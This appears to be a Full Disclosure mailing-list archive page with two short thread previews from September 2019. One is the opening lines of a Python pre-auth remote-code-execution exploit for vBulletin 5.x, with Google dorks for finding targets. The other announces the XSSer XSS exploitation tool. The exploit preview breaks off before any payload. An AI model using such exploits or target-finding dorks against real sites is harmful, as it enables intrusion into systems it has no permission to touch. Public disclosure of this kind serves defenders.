[FD] vBulletin 5.x 0day pre-auth RCE exploit

2019-09-24 Thread i0su9z+32fpome4pivgiwtzjw--- via Fulldisclosure
#!/usr/bin/python # # vBulletin 5.x 0day pre-auth RCE exploit # # This should work on all versions from 5.0.0 till 5.5.4 # # Google Dorks: # - site:*.vbulletin.net # - "Powered by vBulletin Version 5.5.4" import requests import sys if len(sys.argv) != 2: sys.exit("Usage: %s " % sys.argv[0])

[FD] XSSer v.1.8[1] - "The Hive!" released

2019-09-24 Thread psy
Hi FD, I am glad to present a new release of this tool: - https://xsser.03c8.net - "Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications. It provides several options to try to bypass certain filters a